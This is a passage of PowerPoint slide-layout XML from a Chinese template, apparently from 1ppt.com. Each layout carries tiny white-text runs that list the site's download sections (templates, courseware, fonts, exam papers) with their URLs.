              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout71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71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71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71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72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72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72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72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72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72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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout72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72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72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72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73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73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73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73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73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73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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout73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73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73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73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74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74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74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74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74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74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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
